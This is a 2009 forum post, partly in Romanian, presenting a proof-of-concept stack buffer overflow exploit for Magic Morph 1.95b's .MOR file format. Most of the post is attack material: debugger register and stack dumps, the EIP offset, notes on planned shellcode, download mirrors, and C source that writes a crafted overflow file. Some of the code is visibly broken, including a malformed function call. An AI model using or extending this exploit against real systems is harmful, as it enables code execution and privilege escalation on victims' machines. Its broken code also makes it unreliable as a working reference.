fl0 fl0w Posted September 14, 2009 Report Posted September 14, 2009 (edited) My new exploit .Pentru mai multe detalii privind debugging, am pus screenshoturi si altelehttp://rapidshare.com/files/279955517/Portable_E.M_Magic_Morph_1.95b_Buffer_Overflow.zip.htmlhttp://www.2shared.com/file/7794630/5e98eb46/Portable_EM_Magic_Morph_195b_Buffer_Overflow.htmlhttp://www.turboupload.com/2y6snh3b5fad/Portable_E.M_Magic_Morph_1.95b_Buffer_Overflow.zip.htmlAcest buffer overflow este 100% exploatabil rezultand in executie de cod pe un target capatandastfel drepturi de ADMIN pornind de la statusul de USER.Partea cea mai dificila este programarea shellcodului ,deoarece softul are probleme candintampina anumite caractere speciale.1.Trebuie identificate aceste caractere2.Shellcode programat dupa conditiile de fata.3.Exploit imbunatatit prin adaugarea de MULTI-TARGET'URI ,si Multiple shellcoduri./*************************************************Magic Morph .MOR File Stack Buffer Overflow POC *By fl0 fl0w ***************************************************/********************************************************************************************************The EIP offset is at 312 bytes 0x138 HEX *After you compile and create the .MOR file ,edit it with HEX EDITOR and start counting from the start *of the file, and you'll have to rezult with 0x138 bytes * *I used a technique names "stack spray" to determine the offset. **CPU REGISTERS *EAX 00000000 *ECX 33333333 *EDX 01492288 *EBX 00000001 **ESP 0012EF7C ASCII "444bbbbbbbbbbbgggggggggggggggggbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa *````````````````````````````````````````````````YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY *XXXXXXXXXXXXXXXXcccccccccccccccccccccccccccccccc2222222223 *EBP 0012F3CC ASCII "````````````````````````````````````````````````YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY *YYYYYYYYYYYYYYYYXXXXXXXXXXXXXXXXcccccccccccccccccccccccccccccccc2222222223333333333fffffAAAAww44444b *bbbbbbbbbbgggggggggggggggggbaaaaaaaaaaaaaaaaaaaaaaaaaa **ESI 00F369B0 *EDI 00F369B0 *EIP 41414141 **We control ECX, EIP witch is more than enought to copy what addresess you want in the memory. *So I go in OLLYDBG at the ESP register and right click ->follow in stack ,I observe that the corruption*starts at a much lower address. *This is what ESP points to: **********************************************************************************************************//************************STACK *0012EF7C 62343434 *0012EF80 62626262 *0012EF84 62626262 *0012EF88 67676262 *0012EF8C 67676767 *0012EF90 67676767 *0012EF94 67676767 *0012EF98 62676767 *0012EF9C 61616161 *0012EFA0 61616161 *0012EFA4 61616161 *0012EFA8 61616161 *0012EFAC 61616161 *0012EFB0 61616161 *0012EFB4 61616161 *0012EFB8 61616161 *0012EFBC 61616161 *0012EFC0 61616161 *0012EFC4 61616161 *0012EFC8 61616161 *0012EFCC 60606060 *0012EFD0 60606060 *0012EFD4 60606060 *0012EFD8 60606060 *0012EFDC 60606060 *0012EFE0 60606060 *0012EFE4 60606060 *0012EFE8 60606060 *0012EFF0 60606060 *0012EFF4 60606060 *0012EFF8 60606060 *0012EFFC 59595959 *0012F000 59595959 *0012F004 59595959 *0012F008 59595959 *0012F00C 59595959 *..................... *************************//*************************************************You can copy your shellcode starting from here : *0012EC3C 63636363 **0x12EF80 = 1240960 ->NOT-> A **0x12EC3C = 1240124 ->NOT-> B **A > B *A - B = 836 = 0x344 *So the stack gets corrupted a long way from ESP.***************************************************//*************************************************LOOK OF THE DUMP *0012EE4C 63 63 63 63 cccc *0012EE54 63 63 63 63 63 63 63 63 cccccccc *0012EE5C 32 32 32 32 32 32 32 32 22222222 *0012EE64 32 33 33 33 33 33 33 33 23333333 *0012EE6C 33 33 33 66 66 66 66 66 333fffff *0012EE74 41 41 41 41 77 77 34 34 AAAAww44 *0012EE7C 34 34 34 62 62 62 62 62 444bbbbb *0012EE84 62 62 62 62 62 62 67 67 bbbbbbgg *0012EE8C 67 67 67 67 67 67 67 67 gggggggg *0012EE94 67 67 67 67 67 67 67 62 gggggggb *0012EE9C 61 61 61 61 61 61 61 61 aaaaaaaa *0012EEA4 61 61 61 61 61 61 61 61 aaaaaaaa *0012EEAC 61 61 61 61 61 61 61 61 aaaaaaaa *0012EEB4 61 61 61 61 61 61 61 61 aaaaaaaa *0012EEBC 61 61 61 61 61 61 61 61 aaaaaaaa *0012EEC4 61 61 61 61 61 61 61 61 aaaaaaaa *0012EECC 60 60 60 60 60 60 60 60 ```````` *0012EED4 60 60 60 60 60 60 60 60 ```````` *0012EEDC 60 60 60 60 60 60 60 60 ```````` *0012EEE4 60 60 60 60 60 60 60 60 ```````` *0012EEEC 60 60 60 60 60 60 60 60 ```````` *0012EEF4 60 60 60 60 60 60 60 60 ```````` *0012EEFC 59 59 59 59 59 59 59 59 YYYYYYYY *0012EF04 59 59 59 59 59 59 59 59 YYYYYYYY *0012EF0C 59 59 59 59 59 59 59 59 YYYYYYYY *0012EF14 59 59 59 59 59 59 59 59 YYYYYYYY *0012EF1C 59 59 59 59 59 59 59 59 YYYYYYYY *0012EF24 59 59 59 59 59 59 59 59 YYYYYYYY *0012EF2C 58 58 58 58 58 58 58 58 XXXXXXXX *0012EF34 58 58 58 58 58 58 58 58 XXXXXXXX *0012EF3C 63 63 63 63 63 63 63 63 cccccccc *0012EF44 63 63 63 63 63 63 63 63 cccccccc *0012EF4C 63 63 63 63 63 63 63 63 cccccccc *0012EF54 63 63 63 63 63 63 63 63 cccccccc *0012EF5C 32 32 32 32 32 32 32 32 22222222 *0012EF64 32 33 33 33 33 33 33 33 23333333 *0012EF6C 33 33 33 66 66 66 66 66 333fffff *0012EF74 41 41 41 41 77 77 34 34 AAAAww44 *0012EF7C 34 34 34 62 62 62 62 62 444bbbbb *0012EF84 62 62 62 62 62 62 67 67 bbbbbbgg *0012EF8C 67 67 67 67 67 67 67 67 gggggggg *0012EF94 67 67 67 67 67 67 67 62 gggggggb *0012EF9C 61 61 61 61 61 61 61 61 aaaaaaaa *0012EFA4 61 61 61 61 61 61 61 61 aaaaaaaa *0012EFAC 61 61 61 61 61 61 61 61 aaaaaaaa *0012EFB4 61 61 61 61 61 61 61 61 aaaaaaaa *0012EFBC 61 61 61 61 61 61 61 61 aaaaaaaa *0012EFC4 61 61 61 61 61 61 61 61 aaaaaaaa *0012EFCC 60 60 60 60 60 60 60 60 ```````` *0012EFD4 60 60 60 60 60 60 60 60 ```````` *0012EFDC 60 60 60 60 60 60 60 60 ```````` *0012EFE4 60 60 60 60 60 60 60 60 ```````` *0012EFEC 60 60 60 60 60 60 60 60 ```````` *0012EFF4 60 60 60 60 60 60 60 60 ```````` *0012EFFC 59 59 59 59 59 59 59 59 YYYYYYYY *0012F004 59 59 59 59 59 59 59 59 YYYYYYYY *0012F00C 59 59 59 59 59 59 59 59 YYYYYYYY ***************************************************//**************************************************************************************Hello to all my buddies from insecurity.ro ,skullbox.info ,renslt.org *Special greetz to OSHO,!_30,str0ke,Carcabot. *Vizite my website for more bugs ,papers, exploits, pocs and programming techniques. *flo's exploits ***************************************************************************************//*************************************************************************DEMO *C:\Documents and Settings\Stefan\Desktop\magic moth poc>mm.exe ********************************************************************** *Magic Morph .MOR File Stack Buffer Overflow POC *The usage is: *All Credits fl0 fl0w **-f FILE.mor ****************************************************************************C:\Documents and Settings\Stefan\Desktop\magic moth poc>mm.exe -f TEST *File DONE ! ****************************************************************************//************************************************************************************Technicall details *This program was compiled with DEV-Cpp and tested with success on MS Windows Xp Sp3 ***************************************************************************************///START Algorithm#include "stdio.h"#include "string.h"#include "stdlib.h"#include "windows.h"#include "stdint.h"#include "getopt.h"typedef struct flo {uint8_t a;uint8_t b;uint8_t c;}F;void buildFile(char *fname){uint8_t hexfileP1[] ={0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x73, 0x20, 0x61, 0x6E, 0x64,0x20, 0x53, 0x65, 0x74, 0x74, 0x69, 0x6E, 0x67, 0x73, 0x5C, 0x53, 0x74, 0x65, 0x66, 0x61, 0x6E,0x5C, 0x4D, 0x79, 0x20, 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x73, 0x5C, 0x4D, 0x73,0x20, 0x73, 0x75, 0x70, 0x72, 0x65, 0x6D, 0x63, 0x79, 0x30, 0x30, 0x30, 0x2E, 0x6A, 0x70, 0x67,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63,0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63,0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63,0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33,0x33, 0x33, 0x33, 0x66, 0x66, 0x66, 0x66, 0x66, 0x41, 0x41, 0x41, 0x41, 0x77, 0x77, 0x34, 0x34,0x34, 0x34, 0x34, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x67, 0x67,0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x62,};uint8_t hexfileP2[] = {0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61,0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61,0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61,0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60,0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60,0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60,0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59,0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59,0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59,0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58,0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58,0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58,0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58,0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,};uint8_t hexfileP3[] = {0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56,0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x43, 0x3A, 0x5C, 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x73,0x20, 0x61, 0x6E, 0x64, 0x20, 0x53, 0x65, 0x74, 0x74, 0x69, 0x6E, 0x67, 0x73, 0x5C, 0x53, 0x74,0x65, 0x66, 0x61, 0x6E, 0x5C, 0x4D, 0x79, 0x20, 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74,0x73, 0x5C, 0x72, 0x6F, 0x6E, 0x61, 0x6C, 0x64, 0x6F, 0x2D, 0x62, 0x72, 0x61, 0x7A, 0x69, 0x6C,0x2D, 0x77, 0x61, 0x6C, 0x6C, 0x70, 0x61, 0x70, 0x65, 0x72, 0x2E, 0x6A, 0x70, 0x67, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,} ;FILE *f;f = fopen(fname ,"wb");F *Gf;Gf = (F*)malloc(sizeof(F));Gf->a = 0x43;Gf->b = 0x3A;Gf->c = 0x5C;uint8_t B[100];memcpy(B, Gf, sizeof(Gf));fwrite(B, sizeof(uint8_t), 3, f);fwrite(hexfileP1, sizeof(uint8_t), sizeof(hexfileP1), f);fwrite(hexfileP2, sizeof(uint8_t), sizeof(hexfileP2), f);fwrite(hexfileP3, sizeof(uint8_t), sizeof(hexfileP3), f);fclose(f);}void args(int argc, char *argv[]){int file;int a;if(a)while((a = getopt(argc, argv, "f")) != EOF) {switch(a) {case 'f':file = (int)optarg;break;default:exit(-1);}}}void Usage (char *Name){ system("CLS");printf("*********************************************************************\n");fprintf ( stdout , "\t\tMagic Morph .MOR File Stack Buffer Overflow POC\n");printf("The usage is:\n");fprintf ( stdout , "\t\tAll Credits fl0 fl0w\n");}void Menu(){ fprintf(stderr,"\n""\t-f FILE.mor\n""*********************************************************************""\n");}int main(int32_t argc , char *argv[]){ if(argc < 2) {Usage(argv[0]);Menu();exit(-1);}char b[100];strcpy(b, argv[2]);strcat(b, ".mor");buildFile(;printf("File DONE !\n");return 0;}//END AlgorithmReport this post Edited September 14, 2009 by Nytro 1 Quote